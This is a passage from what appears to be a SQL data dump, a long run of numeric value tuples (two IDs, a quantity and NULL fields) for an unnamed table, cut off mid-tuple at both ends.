,77,NULL,20,NULL,NULL),(223,15,NULL,10,NULL,NULL),(223,123,NULL,20,NULL,NULL),(223,209,NULL,10,NULL,NULL),(223,148,NULL,5,NULL,NULL),(124,148,NULL,10,NULL,NULL),(124,123,NULL,10,NULL,NULL),(124,131,NULL,20,NULL,NULL),(130,101,NULL,30,NULL,NULL),(130,91,NULL,5,NULL,NULL),(130,132,NULL,10,NULL,NULL),(130,131,NULL,10,NULL,NULL),(130,148,NULL,5,NULL,NULL),(130,123,NULL,10,NULL,NULL),(125,91,NULL,5,NULL,NULL),(125,109,NULL,15,NULL,NULL),(125,148,NULL,10,NULL,NULL),(125,131,NULL,20,NULL,NULL),(128,148,NULL,10,NULL,NULL),(128,131,NULL,30,NULL,NULL),(127,17,NULL,5,NULL,NULL),(127,155,NULL,5,NULL,NULL),(127,123,NULL,20,NULL,NULL),(127,157,NULL,5,NULL,NULL),(127,132,NULL,20,NULL,NULL),(127,148,NULL,5,NULL,NULL),(144,209,NULL,10,NULL,NULL),(144,109,NULL,50,NULL,NULL),(144,201,NULL,25,NULL,NULL),(145,206,NULL,5,NULL,NULL),(132,109,NULL,10,NULL,NULL),(132,148,NULL,5,NULL,NULL),(132,123,NULL,20,NULL,NULL),(132,111,NULL,5,NULL,NULL),(132,59,NULL,20,NULL,NULL),(132,132,NULL,10,NULL,NULL),(155,82,NULL,20,NULL,NULL),(155,206,NULL,3,NULL,NULL),(155,101,NULL,50,NULL,NULL),(155,109,NULL,100,NULL,NULL),(155,91,NULL,8,NULL,NULL),(155,55,NULL,10,NULL,NULL),(155,165,NULL,10,NULL,NULL),(155,183,NULL,10,NULL,NULL),(155,131,NULL,20,NULL,NULL),(155,132,NULL,10,NULL,NULL),(155,148,NULL,10,NULL,NULL),(155,210,NULL,3,NULL,NULL),(162,135,NULL,30,NULL,NULL),(162,52,NULL,5,NULL,NULL),(162,103,NULL,5,NULL,NULL),(162,148,NULL,10,NULL,NULL),(162,157,NULL,2,NULL,NULL),(162,123,NULL,20,NULL,NULL),(164,131,NULL,15,NULL,NULL),(164,132,NULL,10,NULL,NULL),(164,55,NULL,10,NULL,NULL),(164,210,NULL,10,NULL,NULL),(164,148,NULL,10,NULL,NULL),(164,77,NULL,70,NULL,NULL),(164,123,NULL,20,NULL,NULL),(164,206,NULL,5,NULL,NULL),(238,199,NULL,5,NULL,NULL),(117,109,NULL,75,NULL,NULL),(117,123,NULL,20,NULL,NULL),(117,206,NULL,10,NULL,NULL),(239,29,NULL,100,NULL,NULL),(239,91,NULL,10,NULL,NULL),(239,52,NULL,10,NULL,NULL),(239,103,NULL,5,NULL,NULL),(239,50,NULL,10,NULL,NULL),(239,5,NULL,5,NULL,NULL),(239,194,NULL,30,NULL,NULL),(239,82,NULL,20,NULL,NULL),(239,148,NULL,10,NULL,NULL),(239,202,NULL,35,NULL,NULL),(241,121,NULL,80,NULL,NULL),(241,86,NULL,15,NULL,NULL),(241,102,NULL,20,NULL,NULL),(241,82,NULL,15,NULL,NULL),(241,91,NULL,10,NULL,NULL),(241,50,NULL,15,NULL,NULL),(241,55,NULL,20,NULL,NULL),(241,165,NULL,10,NULL,NULL),(241,77,NULL,20,NULL,NULL),(241,130,NULL,15,NULL,NULL),(241,137,NULL,15,NULL,NULL),(241,155,NULL,10,NULL,NULL),(241,186,NULL,20,NULL,NULL),(242,225,NULL,50,NULL,NULL),(242,52,NULL,30,NULL,NULL),(242,82,NULL,20,NULL,NULL),(242,148,NULL,10,NULL,NULL),(242,103,NULL,5,NULL,NULL),(242,202,NULL,35,NULL,NULL),(243,106,NULL,50,NULL,NULL),(243,91,NULL,20,NULL,NULL),(243,52,NULL,20,NULL,NULL),(243,74,NULL,30,NULL,NULL),(243,50,NULL,20,NULL,NULL),(243,137,NULL,15,NULL,NULL),(243,111,NULL,10,NULL,NULL),(243,96,NULL,10,NULL,NULL),(243,97,NULL,5,NULL,NULL),(243,148,NULL,5,NULL,NULL),(243,59,NULL,20,NULL,NULL),(243,103,NULL,5,NULL,NULL),(244,202,NULL,35,NULL,NULL),(245,226,NULL,100,NULL,NULL),(246,226,NULL,100,NULL,NULL),(246,52,NULL,30,NULL,NULL),(246,82,NULL,15,NULL,NULL),(246,103,NULL,5,NULL,NULL),(246,148,NULL,10,NULL,NULL),(246,202,NULL,35,NULL,NULL),(247,226,NULL,100,NULL,NULL),(247,52,NULL,30,NULL,NULL),(247,82,NULL,15,NULL,NULL),(247,103,NULL,5,NULL,NULL),(247,148,NULL,10,NULL,NULL),(247,202,NULL,35,NULL,NULL),(244,91,NULL,20,NULL,NULL),(244,52,NULL,10,NULL,NULL),(244,50,NULL,10,NULL,NULL),(244,102,NULL,30,NULL,NULL),(244,82,NULL,20,NULL,NULL),(244,86,NULL,20,NULL,NULL),(244,55,NULL,10,NULL,NULL),(244,183,NULL,10,NULL,NULL),(244,165,NULL,10,NULL,NULL),(244,203,NULL,20,NULL,NULL),(244,130,NULL,15,NULL,NULL),(244,137,NULL,15,NULL,NULL),(248,203,NULL,30,NULL,NULL),(249,202,NULL,50,NULL,NULL),(250,92,NULL,30,NULL,NULL),(250,93,NULL,50,NULL,NULL),(250,52,NULL,20,NULL,NULL),(250,82,NULL,10,NULL,NULL),(250,194,NULL,10,NULL,NULL),(250,103,NULL,5,NULL,NULL),(251,50,NULL,10,NULL,NULL),(251,86,NULL,20,NULL,NULL),(251,82,NULL,15,NULL,NULL),(251,74,NULL,20,NULL,NULL),(251,120,NULL,10,NULL,NULL),(251,21,NULL,10,NULL,NULL),(251,103,NULL,5,NULL,NULL),(251,108,NULL,60,NULL,NULL),(251,130,NULL,20,NULL,NULL),(252,205,NULL,30,NULL,NULL),(252,52,NULL,12,NULL,NULL),(252,29,NULL,20,NULL,NULL),(252,214,NULL,30,NULL,NULL),(252,91,NULL,20,NULL,NULL),(252,82,NULL,20,NULL,NULL),(252,148,NULL,5,NULL,NULL),(252,202,NULL,35,NULL,NULL),(253,213,NULL,30,NULL,NULL),(253,52,NULL,20,NULL,NULL),(253,91,NULL,25,NULL,NULL),(253,103,NULL,10,NULL,NULL),(253,119,NULL,5,NULL,NULL),(253,148,NULL,5,NULL,NULL),(253,50,NULL,10,NULL,NULL),(253,93,NULL,40,NULL,NULL),(253,74,NULL,20,NULL,NULL),(254,75,NULL,100,NULL,NULL),(254,52,NULL,15,NULL,NULL),(254,82,NULL,10,NULL,NULL),(254,29,NULL,50,NULL,NULL),(254,103,NULL,5,NULL,NULL),(254,148,NULL,10,NULL,NULL),(254,202,NULL,35,NULL,NULL),(255,148,NULL,8,NULL,NULL),(256,110,NULL,30,NULL,NULL),(256,75,NULL,50,NULL,NULL),(256,52,NULL,20,NULL,NULL),(256,82,NULL,15,NULL,NULL),(256,103,NULL,5,NULL,NULL),(256,202,NULL,35,NULL,NULL),(256,148,NULL,5,NULL,NULL),(199,37,NULL,50,NULL,NULL),(199,39,NULL,50,NULL,NULL),(199,19,NULL,50,NULL,NULL),(199,200,NULL,20,NULL,NULL),(199,5,NULL,5,NULL,NULL),(199,22,NULL,30,NULL,NULL),(199,21,NULL,20,NULL,NULL),(257,76,NULL,200,NULL,NULL),(257,52,NULL,20,NULL,NULL),(257,82,NULL,15,NULL,NULL),(257,103,NULL,5,NULL,NULL),(257,215,NULL,15,NULL,NULL),(257,23,NULL,10,NULL,NULL),(257,148,NULL,5,NULL,NULL),(257,93,NULL,40,NULL,NULL),(258,109,NULL,50,NULL,NULL),(258,101,NULL,30,NULL,NULL),(258,86,NULL,30,NULL,NULL),(258,82,NULL,20,NULL,NULL),(258,74,NULL,20,NULL,NULL),(258,91,NULL,10,NULL,NULL),(258,202,NULL,35,NULL,NULL),(258,148,NULL,5,NULL,NULL),(258,130,NULL,15,NULL,NULL),(259,101,NULL,100,NULL,NULL),(229,23,NULL,40,NULL,NULL),(229,93,NULL,50,NULL,NULL),(229,82,NULL,30,NULL,NULL),(229,148,NULL,5,NULL,NULL),(229,103,NULL,4,NULL,NULL),(229,157,NULL,4,NULL,NULL),(229,52,NULL,10,NULL,NULL),(231,52,NULL,10,NULL,NULL),(231,82,NULL,10,NULL,NULL),(231,103,NULL,3,NULL,NULL),(231,213,NULL,30,NULL,NULL),(231,148,NULL,5,NULL,NULL),(231,202,NULL,50,NULL,NULL),(228,102,NULL,30,NULL,NULL),(228,82,NULL,20,NULL,NULL),(228,86,NULL,20,NULL,NULL),(228,29,NULL,50,NULL,NULL),(228,157,NULL,4,NULL,NULL),(228,103,NULL,2,NULL,NULL),(228,91,NULL,10,NULL,NULL),(228,130,NULL,10,NULL,NULL),(228,137,NULL,10,NULL,NULL),(228,186,NULL,20,NULL,NULL),(260,101,NULL,150,NULL,NULL),(260,123,NULL,30,NULL,NULL),(260,131,NULL,10,NULL,NULL),(260,55,NULL,10,NULL,NULL),(260,148,NULL,10,NULL,NULL),(260,50,NULL,10,NULL,NULL),(260,214,NULL,10,NULL,NULL),(260,59,NULL,10,NULL,NULL),(260,206,NULL,5,NULL,NULL),(261,199,NULL,20,NULL,NULL),(262,211,NULL,70,NULL,NULL),(263,109,NULL,50,NULL,NULL),(265,211,NULL,110,NULL,NULL),(266,109,NULL,100,NULL,NULL),(268,101,NULL,120,NULL,NULL),(269,95,NULL,180,NULL,NULL),(271,101,NULL,50,NULL,NULL),(272,101,NULL,100,NULL,NULL),(273,211,NULL,120,NULL,NULL),(274,211,NULL,130,NULL,NULL),(275,109,NULL,50,NULL,NULL),(277,101,NULL,100,NULL,NULL),(279,211,NULL,120,NULL,NULL),(280,101,NULL,100,NULL,NULL),(280,82,NULL,50,NULL,NULL),(280,87,NULL,25,NULL,NULL),(280,91,NULL,15,NULL,NULL),(280,86,NULL,50,NULL,NULL),(280,84,NULL,20,NULL,NULL),(280,108,NULL,24,NULL,NULL),(280,171,NULL,5,NULL,NULL),(280,148,NULL,4,NULL,NULL),(280,22,NULL,10,NULL,NULL),(249,113,NULL,20,NULL,NULL),(249,91,NULL,10,NULL,NULL),(249,52,NULL,10,NULL,NULL),(249,105,NULL,10,NULL,NULL),(249,55,NULL,10,NULL,NULL),(249,183,NULL,10,NULL,NULL),(249,213,NULL,30,NULL,NULL),(249,131,NULL,30,NULL,NULL),(249,132,NULL,20,NULL,NULL),(281,101,NULL,250,NULL,NULL),(48,96,NULL,10,NULL,NULL),(48,17,NULL,5,NULL,NULL),(48,138,NULL,10,NULL,NULL),(48,6,NULL,5,NULL,NULL),(48,23,NULL,15,NULL,NULL),(48,178,NULL,8,NULL,NULL),(48,148,NULL,7,NULL,NULL),(267,211,NULL,250,NULL,NULL),(20,154,NULL,74,NULL,NULL),(282,50,NULL,50,NULL,NULL),(283,101,NULL,150,NULL,NULL),(264,101,NULL,125,NULL,NULL),(284,86,NULL,50,NULL,NULL),(285,211,NULL,90,NULL,NULL),(285,82,NULL,20,NULL,NULL),(285,86,NULL,20,NULL,NULL),(285,87,NULL,20,NULL,NULL),(285,91,NULL,20,NULL,NULL),(285,108,NULL,75,NULL,NULL),(285,130,NULL,5,NULL,NULL),(285,111,NULL,5,NULL,NULL),(285,137,NULL,7,NULL,NULL),(286,101,NULL,50,NULL,NULL),(287,211,NULL,160,NULL,NULL),(288,128,NULL,30,NULL,NULL),(289,211,NULL,170,NULL,NULL),(290,206,NULL,5,NULL,NULL),(276,211,NULL,180,NULL,NULL),(291,228,NULL,10,NULL,NULL),(292,101,NULL,150,NULL,NULL),(40,161,NULL,50,NULL,NULL),(40,101,NULL,80,NULL,NULL),(40,148,NULL,4,NULL,NULL),(40,135,NULL,15,NULL,NULL),(40,91,NULL,25,NULL,NULL),(40,151,NULL,4,NULL,NULL),(40,111,NULL,4,NULL,NULL),(40,50,NULL,20,NULL,NULL),(40,23,NULL,15,NULL,NULL),(240,161,NULL,50,NULL,NULL),(240,50,NULL,20,NULL,NULL),(240,91,NULL,20,NULL,NULL),(240,21,NULL,20,NULL,NULL),(240,23,NULL,20,NULL,NULL),(240,82,NULL,10,NULL,NULL),(240,137,NULL,20,NULL,NULL),(240,111,NULL,5,NULL,NULL),(240,96,NULL,5,NULL,NULL),(240,148,NULL,5,NULL,NULL),(294,101,NULL,40,NULL,NULL),(295,101,NULL,150,NULL,NULL),(171,148,NULL,10,NULL,NULL),(171,211,NULL,200,NULL,NULL),(171,91,NULL,25,NULL,NULL),(171,52,NULL,25,NULL,NULL),(171,6,NULL,5,NULL,NULL),(104,50,NULL,15,NULL,NULL),(104,82,NULL,15,NULL,NULL),(104,74,NULL,20,NULL,NULL),(104,37,NULL,50,NULL,NULL),(104,86,NULL,30,NULL,NULL),(104,228,NULL,5,NULL,NULL),(65,228,NULL,10,NULL,NULL),(65,129,NULL,2,NULL,NULL),(78,50,NULL,100,NULL,NULL),(289,96,NULL,5,NULL,NULL),(289,17,NULL,5,NULL,NULL),(289,115,NULL,10,NULL,NULL),(289,50,NULL,30,NULL,NULL),(289,21,NULL,15,NULL,NULL),(289,214,NULL,30,NULL,NULL),(289,148,NULL,8,NULL,NULL),(98,108,NULL,24,NULL,NULL),(43,148,NULL,8,NULL,NULL),(43,135,NULL,15,NULL,NULL),(43,203,NULL,25,NULL,NULL),(43,86,NULL,18,NULL,NULL),(43,91,NULL,8,NULL,NULL),(43,74,NULL,20,NULL,NULL),(43,100,NULL,10,NULL,NULL),(43,182,NULL,10,NULL,NULL),(43,202,NULL,40,NULL,NULL),(297,121,NULL,80,NULL,NULL),(297,82,NULL,20,NULL,NULL),(297,109,NULL,50,NULL,NULL),(297,101,NULL,80,NULL,NULL),(297,52,NULL,15,NULL,NULL),(297,102,NULL,10,NULL,NULL),(297,130,NULL,15,NULL,NULL),(297,148,NULL,5,NULL,NULL),(298,101,NULL,60,NULL,NULL),(299,101,NULL,80,NULL,NULL),(300,101,NULL,100,NULL,NULL),(301,211,NULL,60,NULL,NULL),(302,101,NULL,40,NULL,NULL),(303,211,NULL,80,NULL,NULL),(304,121,NULL,80,NULL,NULL),(304,101,NULL,80,NULL,NULL),(304,165,NULL,10,NULL,NULL),(304,55,NULL,10,NULL,NULL),(304,183,NULL,10,NULL,NULL),(304,91,NULL,10,NULL,NULL),(304,82,NULL,10,NULL,NULL),(304,86,NULL,15,NULL,NULL),(304,102,NULL,20,NULL,NULL),(304,130,NULL,10,NULL,NULL),(304,155,NULL,10,NULL,NULL),(304,52,NULL,10,NULL,NULL),(304,50,NULL,8,NULL,NULL),(304,148,NULL,5,NULL,NULL),(305,101,NULL,180,NULL,NULL),(305,131,NULL,15,NULL,NULL),(305,132,NULL,10,NULL,NULL),(305,55,NULL,10,NULL,NULL),(305,165,NULL,10,NULL,NULL),(305,157,NULL,3,NULL,NULL),(305,91,NULL,5,NULL,NULL),(305,77,NULL,30,NULL,NULL),(305,148,NULL,10,NULL,NULL),(305,123,NULL,20,NULL,NULL),(307,101,NULL,90,NULL,NULL),(308,95,NULL,80,NULL,NULL),(307,82,NULL,15,NULL,NULL),(307,135,NULL,10,NULL,NULL),(307,214,NULL,30,NULL,NULL),(307,91,NULL,15,NULL,NULL),(307,52,NULL,3,NULL,NULL),(307,165,NULL,10,NULL,NULL),(307,55,NULL,15,NULL,NULL),(307,132,NULL,30,NULL,NULL),(307,131,NULL,30,NULL,NULL),(307,206,NULL,10,NULL,NULL),(303,55,NULL,20,NULL,NULL),(303,206,NULL,10,NULL,NULL),(303,123,NULL,40,NULL,NULL),(303,132,NULL,20,NULL,NULL),(309,211,NULL,100,NULL,NULL),(309,74,NULL,40,NULL,NULL),(309,82,NULL,35,NULL,NULL),(309,216,NULL,3,NULL,NULL),(309,99,NULL,2,NULL,NULL),(309,111,NULL,5,NULL,NULL),(309,17,NULL,10,NULL,NULL),(309,132,NULL,30,NULL,NULL),(309,189,NULL,3,NULL,NULL),(310,211,NULL,80,NULL,NULL),(311,101,NULL,70,NULL,NULL),(312,101,NULL,50,NULL,NULL),(312,91,NULL,15,NULL,NULL),(312,82,NULL,15,NULL,NULL),(312,74,NULL,15,NULL,NULL),(312,157,NULL,3,NULL,NULL),(312,52,NULL,5,NULL,NULL),(312,123,NULL,20,NULL,NULL),(312,132,NULL,20,NULL,NULL),(312,109,NULL,50,NULL,NULL),(312,209,NULL,15,NULL,NULL),(312,206,NULL,10,NULL,NULL),(312,69,NULL,30,NULL,NULL),(312,131,NULL,5,NULL,NULL),(306,101,NULL,100,NULL,NULL),(313,39,NULL,20,NULL,NULL),(313,50,NULL,30,NULL,NULL),(313,19,NULL,50,NULL,NULL),(313,119,NULL,3,NULL,NULL),(313,5,NULL,10,NULL,NULL),(314,39,NULL,20,NULL,NULL),(314,19,NULL,50,NULL,NULL),(314,50,NULL,30,NULL,NULL),(314,119,NULL,5,NULL,NULL),(314,5,NULL,10,NULL,NULL),(292,17,NULL,1,NULL,NULL),(292,123,NULL,30,NULL,NULL),(292,112,NULL,3,NULL,NULL),(292,88,NULL,3,NULL,NULL),(292,148,NULL,15,NULL,NULL),(292,93,NULL,30,NULL,NULL),(315,77,NULL,30,NULL,NULL),(315,59,NULL,30,NULL,NULL),(315,201,NULL,10,NULL,NULL),(315,19,NULL,50,NULL,NULL),(315,197,NULL,15,NULL,NULL),(316,120,NULL,20,NULL,NULL),(316,50,NULL,50,NULL,NULL),(316,37,NULL,50,NULL,NULL),(317,19,NULL,50,NULL,NULL),(317,197,NULL,15,NULL,NULL),(317,200,NULL,10,NULL,NULL),(317,175,NULL,1,NULL,NULL),(318,19,NULL,50,NULL,NULL),(318,77,NULL,30,NULL,NULL),(318,61,NULL,30,NULL,NULL),(318,197,NULL,15,NULL,NULL),(318,128,NULL,15,NULL,NULL),(318,129,NULL,5,NULL,NULL),(318,200,NULL,20,NULL,NULL),(319,39,NULL,20,NULL,NULL),(319,171,NULL,5,NULL,NULL),(319,128,NULL,10,NULL,NULL),(319,228,NULL,5,NULL,NULL),(319,5,NULL,10,NULL,NULL),(319,156,NULL,5,NULL,NULL),(306,17,NULL,2,NULL,NULL),(306,69,NULL,1,NULL,NULL),(306,189,NULL,3,NULL,NULL),(306,88,NULL,1,NULL,NULL),(306,180,NULL,3,NULL,NULL),(306,99,NULL,3,NULL,NULL),(306,112,NULL,1,NULL,NULL),(306,148,NULL,30,NULL,NULL),(306,206,NULL,20,NULL,NULL),(306,174,NULL,5,NULL,NULL),(296,121,NULL,15,NULL,NULL),(296,95,NULL,160,NULL,NULL),(296,126,NULL,5,NULL,NULL),(296,15,NULL,5,NULL,NULL),(296,52,NULL,5,NULL,NULL),(296,100,NULL,6,NULL,NULL),(296,131,NULL,6,NULL,NULL),(320,95,NULL,160,NULL,NULL),(301,123,NULL,25,NULL,NULL),(301,196,NULL,15,NULL,NULL),(301,132,NULL,10,NULL,NULL),(301,214,NULL,50,NULL,NULL),(301,59,NULL,30,NULL,NULL),(301,75,NULL,50,NULL,NULL),(301,135,NULL,10,NULL,NULL),(301,206,NULL,7,NULL,NULL),(321,204,NULL,100,NULL,NULL),(322,101,NULL,160,NULL,NULL),(322,121,NULL,74,NULL,NULL),(322,130,NULL,6,NULL,NULL),(322,155,NULL,3,NULL,NULL),(322,137,NULL,6,NULL,NULL),(322,74,NULL,16,NULL,NULL),(322,131,NULL,6,NULL,NULL),(262,148,NULL,5,NULL,NULL),(262,74,NULL,5,NULL,NULL),(262,87,NULL,5,NULL,NULL),(262,86,NULL,5,NULL,NULL),(262,91,NULL,5,NULL,NULL),(262,108,NULL,75,NULL,NULL),(262,182,NULL,10,NULL,NULL),(262,100,NULL,7,NULL,NULL),(270,211,NULL,120,NULL,NULL),(271,109,NULL,50,NULL,NULL),(271,108,NULL,24,NULL,NULL),(271,165,NULL,7,NULL,NULL),(271,91,NULL,5,NULL,NULL),(271,82,NULL,5,NULL,NULL),(271,148,NULL,5,NULL,NULL),(245,52,NULL,30,NULL,NULL),(245,82,NULL,15,NULL,NULL),(245,103,NULL,5,NULL,NULL),(245,148,NULL,10,NULL,NULL),(245,202,NULL,35,NULL,NULL),(248,93,NULL,50,NULL,NULL),(248,50,NULL,30,NULL,NULL),(248,91,NULL,20,NULL,NULL),(248,29,NULL,40,NULL,NULL),(248,52,NULL,10,NULL,NULL),(248,74,NULL,20,NULL,NULL),(248,103,NULL,5,NULL,NULL),(248,148,NULL,10,NULL,NULL),(278,211,NULL,130,NULL,NULL),(225,74,NULL,10,NULL,NULL),(225,86,NULL,20,NULL,NULL),(225,123,NULL,5,NULL,NULL),(225,101,NULL,50,NULL,NULL),(225,52,NULL,3,NULL,NULL),(225,131,NULL,15,NULL,NULL),(225,55,NULL,7,NULL,NULL),(225,148,NULL,10,NULL,NULL),(286,50,NULL,20,NULL,NULL),(286,82,NULL,40,NULL,NULL),(286,86,NULL,30,NULL,NULL),(286,52,NULL,10,NULL,NULL),(286,21,NULL,15,NULL,NULL),(286,188,NULL,7,NULL,NULL),(286,194,NULL,30,NULL,NULL),(286,109,NULL,50,NULL,NULL),(99,101,NULL,80,NULL,NULL),(99,91,NULL,15,NULL,NULL),(99,186,NULL,15,NULL,NULL),(179,148,NULL,5,NULL,NULL),(179,82,NULL,10,NULL,NULL),(179,206,NULL,5,NULL,NULL),(179,105,NULL,5,NULL,NULL),(179,52,NULL,8,NULL,NULL),(179,132,NULL,10,NULL,NULL),(179,91,NULL,15,NULL,NULL),(179,183,NULL,8,NULL,NULL),(180,148,NULL,15,NULL,NULL),(180,119,NULL,3,NULL,NULL),(180,17,NULL,3,NULL,NULL),(180,103,NULL,2,NULL,NULL),(180,52,NULL,8,NULL,NULL),(180,82,NULL,10,NULL,NULL),(180,69,NULL,5,NULL,NULL),(79,94,NULL,15,NULL,NULL),(79,109,NULL,50,NULL,NULL),(79,122,NULL,4,NULL,NULL),(282,29,NULL,50,NULL,NULL),(282,23,NULL,20,NULL,NULL),(282,39,NULL,50,NULL,NULL),(282,37,NULL,40,NULL,NULL),(282,165,NULL,10,NULL,NULL),(282,87,NULL,5,NULL,NULL),(282,182,NULL,5,NULL,NULL),(282,123,NULL,5,NULL,NULL),(282,111,NULL,2,NULL,NULL),(282,42,NULL,10,NULL,NULL),(282,137,NULL,5,NULL,NULL),(282,21,NULL,15,NULL,NULL),(283,194,NULL,10,NULL,NULL),(283,52,NULL,10,NULL,NULL),(283,91,NULL,10,NULL,NULL),(283,148,NULL,5,NULL,NULL),(283,82,NULL,10,NULL,NULL),(267,196,NULL,10,NULL,NULL),(267,96,NULL,10,NULL,NULL),(267,157,NULL,3,NULL,NULL),(267,90,NULL,10,NULL,NULL),(267,94,NULL,5,NULL,NULL),(267,117,NULL,3,NULL,NULL),(267,148,NULL,7,NULL,NULL),(267,6,NULL,3,NULL,NULL),(267,17,NULL,5,NULL,NULL),(266,91,NULL,5,NULL,NULL),(266,52,NULL,5,NULL,NULL),(266,103,NULL,5,NULL,NULL),(266,82,NULL,5,NULL,NULL),(266,148,NULL,3,NULL,NULL),(266,108,NULL,24,NULL,NULL),(268,52,NULL,15,NULL,NULL),(268,82,NULL,50,NULL,NULL),(268,207,NULL,3,NULL,NULL),(268,93,NULL,40,NULL,NULL),(268,135,NULL,10,NULL,NULL),(268,157,NULL,2,NULL,NULL),(268,62,NULL,20,NULL,NULL),(268,91,NULL,15,NULL,NULL),(268,148,NULL,10,NULL,NULL),(321,121,NULL,74,NULL,NULL),(321,187,NULL,8,NULL,NULL),(321,130,NULL,8,NULL,NULL),(321,155,NULL,8,NULL,NULL),(321,82,NULL,5,NULL,NULL),(321,52,NULL,5,NULL,NULL),(321,183,NULL,5,NULL,NULL),(321,131,NULL,20,NULL,NULL),(321,148,NULL,15,NULL,NULL),(189,102,NULL,20,NULL,NULL),(189,148,NULL,4,NULL,NULL),(189,108,NULL,90,NULL,NULL),(189,100,NULL,10,NULL,NULL),(189,130,NULL,10,NULL,NULL),(189,155,NULL,3,NULL,NULL),(189,117,NULL,1,NULL,NULL),(189,86,NULL,15,NULL,NULL),(189,50,NULL,10,NULL,NULL),(189,74,NULL,30,NULL,NULL),(191,74,NULL,50,NULL,NULL),(191,91,NULL,20,NULL,NULL),(191,52,NULL,20,NULL,NULL),(191,50,NULL,30,NULL,NULL),(191,96,NULL,10,NULL,NULL),(191,111,NULL,10,NULL,NULL),(191,137,NULL,10,NULL,NULL),(191,148,NULL,5,NULL,NULL),(191,101,NULL,150,NULL,NULL),(67,102,NULL,40,NULL,NULL),(67,82,NULL,30,NULL,NULL),(67,86,NULL,40,NULL,NULL),(67,52,NULL,30,NULL,NULL),(67,189,NULL,15,NULL,NULL),(67,188,NULL,8,NULL,NULL),(67,148,NULL,8,NULL,NULL),(194,52,NULL,20,NULL,NULL),(194,102,NULL,50,NULL,NULL),(194,82,NULL,30,NULL,NULL),(194,91,NULL,30,NULL,NULL),(194,165,NULL,50,NULL,NULL),(194,213,NULL,10,NULL,NULL),(194,148,NULL,10,NULL,NULL),(194,97,NULL,5,NULL,NULL),(194,69,NULL,3,NULL,NULL),(194,155,NULL,5,NULL,NULL),(194,17,NULL,2,NULL,NULL),(194,99,NULL,1,NULL,NULL),(194,5,NULL,5,NULL,NULL),(320,121,NULL,30,NULL,NULL),(320,131,NULL,6,NULL,NULL),(320,74,NULL,15,NULL,NULL),(320,137,NULL,6,NULL,NULL),(320,130,NULL,6,NULL,NULL),(320,155,NULL,3,NULL,NULL),(261,174,NULL,150,NULL,NULL),(219,101,NULL,80,NULL,NULL),(219,52,NULL,10,NULL,NULL),(219,91,NULL,10,NULL,NULL),(219,74,NULL,20,NULL,NULL),(219,17,NULL,5,NULL,NULL),(219,148,NULL,5,NULL,NULL),(219,130,NULL,20,NULL,NULL),(210,95,NULL,150,NULL,NULL),(210,52,NULL,10,NULL,NULL),(210,183,NULL,10,NULL,NULL),(210,148,NULL,5,NULL,NULL),(210,82,NULL,15,NULL,NULL),(210,182,NULL,15,NULL,NULL),(210,74,NULL,10,NULL,NULL),(87,108,NULL,90,NULL,NULL),(87,182,NULL,30,NULL,NULL),(87,101,NULL,70,NULL,NULL),(87,82,NULL,20,NULL,NULL),(87,102,NULL,10,NULL,NULL),(87,86,NULL,20,NULL,NULL),(211,101,NULL,80,NULL,NULL),(211,91,NULL,20,NULL,NULL),(211,52,NULL,10,NULL,NULL),(211,96,NULL,10,NULL,NULL),(211,148,NULL,5,NULL,NULL),(211,111,NULL,10,NULL,NULL),(211,137,NULL,5,NULL,NULL),(295,108,NULL,48,NULL,NULL),(295,132,NULL,30,NULL,NULL),(295,148,NULL,2,NULL,NULL),(208,52,NULL,5,NULL,NULL),(208,91,NULL,5,NULL,NULL),(208,74,NULL,10,NULL,NULL),(208,82,NULL,5,NULL,NULL),(208,50,NULL,5,NULL,NULL),(208,181,NULL,1,NULL,NULL),(208,86,NULL,5,NULL,NULL),(208,148,NULL,5,NULL,NULL),(208,100,NULL,10,NULL,NULL),(208,130,NULL,10,NULL,NULL),(221,109,NULL,50,NULL,NULL),(221,50,NULL,20,NULL,NULL),(221,91,NULL,10,NULL,NULL),(221,214,NULL,20,NULL,NULL),(221,186,NULL,20,NULL,NULL),(221,148,NULL,5,NULL,NULL),(89,197,NULL,15,NULL,NULL),(291,129,NULL,5,NULL,NULL),(291,5,NULL,4,NULL,NULL),(291,2,NULL,4,NULL,NULL),(259,91,NULL,10,NULL,NULL),(259,52,NULL,10,NULL,NULL),(259,50,NULL,10,NULL,NULL),(259,82,NULL,20,NULL,NULL),(259,111,NULL,10,NULL,NULL),(259,96,NULL,10,NULL,NULL),(259,97,NULL,5,NULL,NULL),(259,137,NULL,15,NULL,NULL),(259,93,NULL,30,NULL,NULL),(259,106,NULL,30,NULL,NULL),(259,104,NULL,7,NULL,NULL),(259,148,NULL,5,NULL,NULL),(192,91,NULL,30,NULL,NULL),(192,183,NULL,10,NULL,NULL),(192,21,NULL,100,NULL,NULL),(192,130,NULL,20,NULL,NULL),(192,194,NULL,15,NULL,NULL),(192,157,NULL,3,NULL,NULL),(183,52,NULL,20,NULL,NULL),(183,50,NULL,40,NULL,NULL),(183,91,NULL,40,NULL,NULL),(183,82,NULL,30,NULL,NULL),(183,137,NULL,15,NULL,NULL),(183,111,NULL,10,NULL,NULL),(183,109,NULL,50,NULL,NULL),(183,93,NULL,40,NULL,NULL),(183,148,NULL,5,NULL,NULL),(183,100,NULL,15,NULL,NULL),(197,91,NULL,20,NULL,NULL),(197,55,NULL,30,NULL,NULL),(197,111,NULL,10,NULL,NULL),(197,123,NULL,20,NULL,NULL),(197,131,NULL,20,NULL,NULL),(197,132,NULL,10,NULL,NULL),(197,206,NULL,10,NULL,NULL),(197,59,NULL,30,NULL,NULL),(197,214,NULL,30,NULL,NULL),(207,101,NULL,80,NULL,NULL),(207,91,NULL,10,NULL,NULL),(207,74,NULL,15,NULL,NULL),(207,148,NULL,5,NULL,NULL),(207,130,NULL,25,NULL,NULL),(207,17,NULL,5,NULL,NULL),(20,101,NULL,80,NULL,NULL),(20,117,NULL,4,NULL,NULL),(20,100,NULL,4,NULL,NULL),(20,155,NULL,4,NULL,NULL),(20,82,NULL,10,NULL,NULL),(20,91,NULL,10,NULL,NULL),(20,55,NULL,10,NULL,NULL),(20,148,NULL,4,NULL,NULL),(20,86,NULL,20,NULL,NULL),(20,102,NULL,5,NULL,NULL),(311,75,NULL,70,NULL,NULL),(311,123,NULL,30,NULL,NULL),(311,109,NULL,20,NULL,NULL),(311,206,NULL,20,NULL,NULL),(311,131,NULL,20,NULL,NULL),(311,132,NULL,20,NULL,NULL),(323,61,NULL,20,NULL,NULL),(323,206,NULL,15,NULL,NULL),(323,198,NULL,1,NULL,NULL),(323,196,NULL,3,NULL,NULL),(323,123,NULL,10,NULL,NULL),(323,209,NULL,8,NULL,NULL),(323,109,NULL,120,NULL,NULL),(324,211,NULL,80,NULL,NULL),(325,211,NULL,130,NULL,NULL),(326,101,NULL,100,